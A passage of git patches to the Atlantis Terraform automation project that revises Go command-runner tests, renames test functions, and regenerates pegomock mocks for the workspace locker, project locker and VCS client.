+func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
+	t.Log("if parsing the returned github pull request fails an error should be logged")
+	setup(t)
+	var pull github.PullRequest
+	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
+
+	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+	Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
+}
+
+func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
+	t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
+		" comment saying that this is not allowed")
+	setup(t)
+	ch.AllowForkPRs = false // by default it's false so don't need to reset
+	var pull github.PullRequest
+	modelPull := models.PullRequest{State: models.Open}
+	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+
+	headRepo := fixtures.GithubRepo
+	headRepo.FullName = "forkrepo/atlantis"
+	headRepo.Owner = "forkrepo"
+	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
+
+	ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil)
+	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
+}
+
+func TestExecuteCommand_ClosedPull(t *testing.T) {
+	t.Log("if a command is run on a closed pull request atlantis should" +
+		" comment saying that this is not allowed")
+	setup(t)
+	pull := &github.PullRequest{
+		State: github.String("closed"),
+	}
+	modelPull := models.PullRequest{State: models.Closed}
+	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+	When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
+
+	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
+}
+
+func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
+	t.Log("if the workspace is locked, should comment back on the pull")
+	setup(t)
+	pull := &github.PullRequest{
+		State: github.String("closed"),
+	}
+	cmd := events.CommentCommand{
+		Name:      events.Plan,
+		Workspace: "workspace",
+	}
+
+	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+	When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
+	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
+	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
+
+	msg := "The workspace workspace is currently locked by another" +
+		" command that is running for this pull request." +
+		" Wait until the previous command is complete and try again."
+	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName())
+	_, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+	Equals(t, msg, result.Failure)
+	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
+		"**Plan Failed**: "+msg+"\n\n")
+}
+
+func TestExecuteCommand_FullRun(t *testing.T) {
+	t.Log("when running a plan, apply should comment")
+	pull := &github.PullRequest{
+		State: github.String("closed"),
+	}
+	cmdResult := events.CommandResult{}
+	for _, c := range []events.CommandName{events.Plan, events.Apply} {
+		setup(t)
+		cmd := events.CommentCommand{
+			Name:      c,
+			Workspace: "workspace",
+		}
+		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
+		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+		switch c {
+		case events.Plan:
+			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
+		case events.Apply:
+			When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
+		}
+
+		ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
+
+		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
+		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+		Equals(t, cmdResult, response)
+		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+	}
+}
+
+func TestExecuteCommand_ForkPREnabled(t *testing.T) {
+	t.Log("when running a plan on a fork PR, it should succeed")
+	setup(t)
+
+	// Enable forked PRs.
+	ch.AllowForkPRs = true
+	defer func() { ch.AllowForkPRs = false }() // Reset after test.
+
+	var pull github.PullRequest
+	cmdResponse := events.CommandResult{}
+	cmd := events.CommentCommand{
+		Name:      events.Plan,
+		Workspace: "workspace",
+	}
+	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+	headRepo := fixtures.GithubRepo
+	headRepo.FullName = "forkrepo/atlantis"
+	headRepo.Owner = "forkrepo"
+	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
+	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
+
+	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
+
+	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
+	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+	Equals(t, cmdResponse, response)
+	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+}
diff --git a/server/events/executor.go b/server/events/executor.go
deleted file mode 100644
index b308e9d02c..0000000000
--- a/server/events/executor.go
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_executor.go Executor
-
-// Executor is the generic interface implemented by each command type:
-// help, plan, and apply.
-type Executor interface {
-	Execute(ctx *CommandContext) CommandResult
-}
diff --git a/server/events/mocks/matchers/events_commandparseresult.go b/server/events/mocks/matchers/events_commandparseresult.go
deleted file mode 100644
index 12e5991a7e..0000000000
--- a/server/events/mocks/matchers/events_commandparseresult.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
-	"reflect"
-
-	"github.com/petergtz/pegomock"
-	events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsCommandParseResult() events.CommentParseResult {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommentParseResult))(nil)).Elem()))
-	var nullValue events.CommentParseResult
-	return nullValue
-}
-
-func EqEventsCommandParseResult(value events.CommentParseResult) events.CommentParseResult {
-	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue events.CommentParseResult
-	return nullValue
-}
diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go
similarity index 51%
rename from server/events/mocks/matchers/ptr_to_events_command.go
rename to server/events/mocks/matchers/ptr_to_events_trylockresponse.go
index 771aacf306..14d747bb4a 100644
--- a/server/events/mocks/matchers/ptr_to_events_command.go
+++ b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go
@@ -7,14 +7,14 @@ import (
 	events "github.com/runatlantis/atlantis/server/events"
 )
 
-func AnyPtrToEventsCommand() *events.CommentCommand {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem()))
-	var nullValue *events.CommentCommand
+func AnyPtrToEventsTryLockResponse() *events.TryLockResponse {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.TryLockResponse))(nil)).Elem()))
+	var nullValue *events.TryLockResponse
 	return nullValue
 }
 
-func EqPtrToEventsCommand(value *events.CommentCommand) *events.CommentCommand {
+func EqPtrToEventsTryLockResponse(value *events.TryLockResponse) *events.TryLockResponse {
 	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue *events.CommentCommand
+	var nullValue *events.TryLockResponse
 	return nullValue
 }
diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_atlantis_workspace_locker.go
index 3f190f396e..cd4236ced8 100644
--- a/server/events/mocks/mock_atlantis_workspace_locker.go
+++ b/server/events/mocks/mock_atlantis_workspace_locker.go
@@ -29,6 +29,22 @@ func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace
 	return ret0
 }
 
+func (mock *MockAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) {
+	params := []pegomock.Param{repoFullName, workspace, pullNum}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock2", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 func()
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(func())
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
 func (mock *MockAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{})
@@ -87,6 +103,41 @@ func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArgu
 	return
 }
 
+func (verifier *VerifierAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock2_OngoingVerification {
+	params := []pegomock.Param{repoFullName, workspace, pullNum}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock2", params)
+	return &AtlantisWorkspaceLocker_TryLock2_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type AtlantisWorkspaceLocker_TryLock2_OngoingVerification struct {
+	mock              *MockAtlantisWorkspaceLocker
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetCapturedArguments() (string, string, int) {
+	repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
+	return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
+}
+
+func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]string, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(string)
+		}
+		_param1 = make([]string, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(string)
+		}
+		_param2 = make([]int, len(params[2]))
+		for u, param := range params[2] {
+			_param2[u] = param.(int)
+		}
+	}
+	return
+}
+
 func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go
deleted file mode 100644
index 208f43050e..0000000000
--- a/server/events/mocks/mock_executor.go
+++ /dev/null
@@ -1,76 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: Executor)
-
-package mocks
-
-import (
-	"reflect"
-
-	pegomock "github.com/petergtz/pegomock"
-	events "github.com/runatlantis/atlantis/server/events"
-)
-
-type MockExecutor struct {
-	fail func(message string, callerSkip ...int)
-}
-
-func NewMockExecutor() *MockExecutor {
-	return &MockExecutor{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResult {
-	params := []pegomock.Param{ctx}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResult)(nil)).Elem()})
-	var ret0 events.CommandResult
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(events.CommandResult)
-		}
-	}
-	return ret0
-}
-
-func (mock *MockExecutor) VerifyWasCalledOnce() *VerifierExecutor {
-	return &VerifierExecutor{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierExecutor {
-	return &VerifierExecutor{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierExecutor {
-	return &VerifierExecutor{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierExecutor struct {
-	mock                   *MockExecutor
-	invocationCountMatcher pegomock.Matcher
-	inOrderContext         *pegomock.InOrderContext
-}
-
-func (verifier *VerifierExecutor) Execute(ctx *events.CommandContext) *Executor_Execute_OngoingVerification {
-	params := []pegomock.Param{ctx}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
-	return &Executor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type Executor_Execute_OngoingVerification struct {
-	mock              *MockExecutor
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *Executor_Execute_OngoingVerification) GetCapturedArguments() *events.CommandContext {
-	ctx := c.GetAllCapturedArguments()
-	return ctx[len(ctx)-1]
-}
-
-func (c *Executor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*events.CommandContext, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*events.CommandContext)
-		}
-	}
-	return
-}
diff --git a/server/events/mocks/mock_project_lock.go b/server/events/mocks/mock_project_lock.go
new file mode 100644
index 0000000000..b28b6d2206
--- /dev/null
+++ b/server/events/mocks/mock_project_lock.go
@@ -0,0 +1,98 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectLocker)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+	models "github.com/runatlantis/atlantis/server/events/models"
+	logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockProjectLocker struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectLocker() *MockProjectLocker {
+	return &MockProjectLocker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*events.TryLockResponse, error) {
+	params := []pegomock.Param{log, pull, user, workspace, project}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((**events.TryLockResponse)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 *events.TryLockResponse
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(*events.TryLockResponse)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockProjectLocker) VerifyWasCalledOnce() *VerifierProjectLocker {
+	return &VerifierProjectLocker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectLocker {
+	return &VerifierProjectLocker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectLocker {
+	return &VerifierProjectLocker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectLocker struct {
+	mock                   *MockProjectLocker
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) *ProjectLocker_TryLock_OngoingVerification {
+	params := []pegomock.Param{log, pull, user, workspace, project}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
+	return &ProjectLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectLocker_TryLock_OngoingVerification struct {
+	mock              *MockProjectLocker
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectLocker_TryLock_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.PullRequest, models.User, string, models.Project) {
+	log, pull, user, workspace, project := c.GetAllCapturedArguments()
+	return log[len(log)-1], pull[len(pull)-1], user[len(user)-1], workspace[len(workspace)-1], project[len(project)-1]
+}
+
+func (c *ProjectLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.PullRequest, _param2 []models.User, _param3 []string, _param4 []models.Project) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*logging.SimpleLogger, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*logging.SimpleLogger)
+		}
+		_param1 = make([]models.PullRequest, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(models.PullRequest)
+		}
+		_param2 = make([]models.User, len(params[2]))
+		for u, param := range params[2] {
+			_param2[u] = param.(models.User)
+		}
+		_param3 = make([]string, len(params[3]))
+		for u, param := range params[3] {
+			_param3[u] = param.(string)
+		}
+		_param4 = make([]models.Project, len(params[4]))
+		for u, param := range params[4] {
+			_param4[u] = param.(models.Project)
+		}
+	}
+	return
+}
diff --git a/server/events/vcs/mocks/mock_client.go b/server/events/vcs/mocks/mock_client.go
index 56aa654b35..025488befd 100644
--- a/server/events/vcs/mocks/mock_client.go
+++ b/server/events/vcs/mocks/mock_client.go
@@ -35,8 +35,8 @@ func (mock *MockClient) GetModifiedFiles(repo models.Repo, pull models.PullReque
 	return ret0, ret1
 }
 
-func (mock *MockClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) error {
-	params := []pegomock.Param{repo, pull, comment}
+func (mock *MockClient) CreateComment(repo models.Repo, pullNum int, comment string) error {
+	params := []pegomock.Param{repo, pullNum, comment}
 	result := pegomock.GetGenericMockFrom(mock).Invoke("CreateComment", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 error
 	if len(result) != 0 {
@@ -124,8 +124,8 @@ func (c *Client_GetModifiedFiles_OngoingVerification) GetAllCapturedArguments()
 	return
 }
 
-func (verifier *VerifierClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) *Client_CreateComment_OngoingVerification {
-	params := []pegomock.Param{repo, pull, comment}
+func (verifier *VerifierClient) CreateComment(repo models.Repo, pullNum int, comment string) *Client_CreateComment_OngoingVerification {
+	params := []pegomock.Param{repo, pullNum, comment}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "CreateComment", params)
 	return &Client_CreateComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
@@ -135,21 +135,21 @@ type Client_CreateComment_OngoingVerification struct {
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
-	repo, pull, comment := c.GetAllCapturedArguments()
-	return repo[len(repo)-1], pull[len(pull)-1], comment[len(comment)-1]
+func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, int, string) {
+	repo, pullNum, comment := c.GetAllCapturedArguments()
+	return repo[len(repo)-1], pullNum[len(pullNum)-1], comment[len(comment)-1]
 }
 
-func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []int, _param2 []string) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]models.Repo, len(params[0]))
 		for u, param := range params[0] {
 			_param0[u] = param.(models.Repo)
 		}
-		_param1 = make([]models.PullRequest, len(params[1]))
+		_param1 = make([]int, len(params[1]))
 		for u, param := range params[1] {
-			_param1[u] = param.(models.PullRequest)
+			_param1[u] = param.(int)
 		}
 		_param2 = make([]string, len(params[2]))
 		for u, param := range params[2] {
diff --git a/server/logging/simple_logger.go b/server/logging/simple_logger.go
index ddb56ebcd4..eca5778e4f 100644
--- a/server/logging/simple_logger.go
+++ b/server/logging/simple_logger.go
@@ -23,6 +23,8 @@ import (
 	"unicode"
 )
 
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_simple_logging.go SimpleLogging
+
 // SimpleLogging is the interface that our SimpleLogger implements.
 // It's really only used for mocking when we need to test what's being logged.
 type SimpleLogging interface {

From 9e1d92b5d83d03924a8fbbd037b1de501efd5b4d Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 21 Jun 2018 19:07:42 +0100
Subject: [PATCH 43/69] WIP

---
 server/events/command_runner_test.go | 46 ++++++----------------------
 1 file changed, 10 insertions(+), 36 deletions(-)

diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
index 456ce6d293..dcb2c77fde 100644
--- a/server/events/command_runner_test.go
+++ b/server/events/command_runner_test.go
@@ -69,7 +69,7 @@ func setup(t *testing.T) {
 	}
 }
 
-func TestExecuteCommand_LogPanics(t *testing.T) {
+func TestRunCommentCommand_LogPanics(t *testing.T) {
 	t.Log("if there is a panic it is commented back on the pull request")
 	setup(t)
 	ch.AllowForkPRs = true // Lets us get to the panic code.
@@ -80,7 +80,7 @@ func TestExecuteCommand_LogPanics(t *testing.T) {
 	Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
 }
 
-func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
+func TestRunCommentCommand_NoGithubPullGetter(t *testing.T) {
 	t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged")
 	setup(t)
 	ch.GithubPullGetter = nil
@@ -88,7 +88,7 @@ func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
 	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
 }
 
-func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
+func TestRunCommentCommand_NoGitlabMergeGetter(t *testing.T) {
 	t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged")
 	setup(t)
 	ch.GitlabMergeRequestGetter = nil
@@ -96,7 +96,7 @@ func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
 	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
 }
 
-func TestExecuteCommand_GithubPullErr(t *testing.T) {
+func TestRunCommentCommand_GithubPullErr(t *testing.T) {
 	t.Log("if getting the github pull request fails an error should be logged")
 	setup(t)
 	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
@@ -104,7 +104,7 @@ func TestExecuteCommand_GithubPullErr(t *testing.T) {
 	Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
 }
 
-func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
+func TestRunCommentCommand_GitlabMergeRequestErr(t *testing.T) {
 	t.Log("if getting the gitlab merge request fails an error should be logged")
 	setup(t)
 	When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
@@ -112,7 +112,7 @@ func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
 	Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
 }
 
-func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
+func TestRunCommentCommand_GithubPullParseErr(t *testing.T) {
 	t.Log("if parsing the returned github pull request fails an error should be logged")
 	setup(t)
 	var pull github.PullRequest
@@ -123,7 +123,7 @@ func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
 	Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
 }
 
-func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
+func TestRunCommentCommand_ForkPRDisabled(t *testing.T) {
 	t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
 		" comment saying that this is not allowed")
 	setup(t)
@@ -141,7 +141,7 @@ func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
 	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
 }
 
-func TestExecuteCommand_ClosedPull(t *testing.T) {
+func TestRunCommentCommand_ClosedPull(t *testing.T) {
 	t.Log("if a command is run on a closed pull request atlantis should" +
 		" comment saying that this is not allowed")
 	setup(t)
@@ -156,33 +156,7 @@ func TestExecuteCommand_ClosedPull(t *testing.T) {
 	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
 }
 
-func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
-	t.Log("if the workspace is locked, should comment back on the pull")
-	setup(t)
-	pull := &github.PullRequest{
-		State: github.String("closed"),
-	}
-	cmd := events.CommentCommand{
-		Name:      events.Plan,
-		Workspace: "workspace",
-	}
-
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-	When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
-	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
-	msg := "The workspace workspace is currently locked by another" +
-		" command that is running for this pull request." +
-		" Wait until the previous command is complete and try again."
-	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName())
-	_, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-	Equals(t, msg, result.Failure)
-	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
-		"**Plan Failed**: "+msg+"\n\n")
-}
-
-func TestExecuteCommand_FullRun(t *testing.T) {
+func TestRunCommentCommand_FullRun(t *testing.T) {
 	t.Log("when running a plan, apply should comment")
 	pull := &github.PullRequest{
 		State: github.String("closed"),
@@ -214,7 +188,7 @@ func TestExecuteCommand_FullRun(t *testing.T) {
 	}
 }
 
-func TestExecuteCommand_ForkPREnabled(t *testing.T) {
